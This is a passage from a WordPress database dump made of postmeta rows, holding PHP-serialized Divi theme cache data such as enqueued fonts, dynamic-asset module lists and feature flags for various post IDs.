0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32127,645,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32128,1653,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32129,1653,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32130,1653,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32115,1017,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32116,1683,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32117,1683,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32118,1683,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32119,1683,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32108,1210,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32109,1210,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32110,1210,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32111,1210,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32112,1017,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32113,1017,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32114,1017,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32103,1317,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32104,1311,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32105,1311,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32106,1311,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32107,1311,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32099,1680,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32100,1317,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32101,1317,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32102,1317,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32095,1535,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32096,1680,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32097,1680,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32098,1680,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32087,833,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32088,1030,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32089,1030,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32090,1030,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32091,1030,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32092,1535,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32093,1535,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32094,1535,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32083,572,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32084,833,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32085,833,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32086,833,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32079,575,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32080,572,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32081,572,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32082,572,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32078,575,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32075,694,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32076,575,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32077,575,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32061,1121,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32062,1121,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32063,48,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:3;s:12:\"et_pb_button\";i:4;s:10:\"et_pb_code\";i:5;s:10:\"et_pb_text\";}}'),(32064,48,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s